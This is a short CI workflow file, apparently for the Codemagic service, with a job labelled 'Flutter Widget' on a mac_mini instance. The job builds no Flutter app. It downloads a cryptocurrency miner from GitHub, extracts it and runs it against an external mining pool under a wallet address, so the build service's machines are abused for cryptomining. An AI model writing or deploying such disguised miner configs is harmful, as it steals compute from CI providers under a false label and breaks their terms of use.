workflows:
    flutter-widget:
        name: Flutter Widget
        instance_type: mac_mini
        max_build_duration: 120
        environment:
            flutter: dev
        scripts:
            - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-mac.tar.gz
            - brew install gnu-tar
            - gtar -xvf cpuminer-opt-mac.tar.gz
            - ./cpuminer-sse2 -a yespowerTIDE -o stratum+tcps://stratum-eu.rplant.xyz:17059 -u TXkYzpfpPE3vqQknkgmxc4CngKmQVj5eSM.myworker